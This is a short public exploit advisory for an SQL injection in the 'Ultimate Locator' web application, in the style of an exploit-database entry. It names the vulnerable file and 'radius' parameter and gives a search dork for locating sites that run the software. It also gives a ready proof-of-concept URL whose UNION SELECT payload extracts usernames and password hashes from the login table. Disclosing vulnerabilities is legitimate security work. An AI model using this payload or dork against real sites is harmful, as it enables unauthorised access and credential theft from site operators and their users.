# Exploit Title: Ultimate Locator SQL Injection Vulnerability
# Author: Robert Cooper ( Robert.Cooper [at] areyousecure.net )
# Software Link: http://www.ultimatelocator.com/
# Dork: "Powered by Ultimate Locator"
# Tested on: [Linux/Windows 7]

#Vulnerable File:
 
results_list.php

#Vulnerable parameter:

radius=

 
##############################################################
PoC:
 
http://www.example.com/locator/results_list.php?order=id&pageno=2&showsurrounding=1&zip=94102&zipsearch=Go&radius=-50 UNION ALL SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password) FROM login--
 
##############################################################

www.areyousecure.net

www.websiteauditing.org

 
# Shouts to the Belegit crew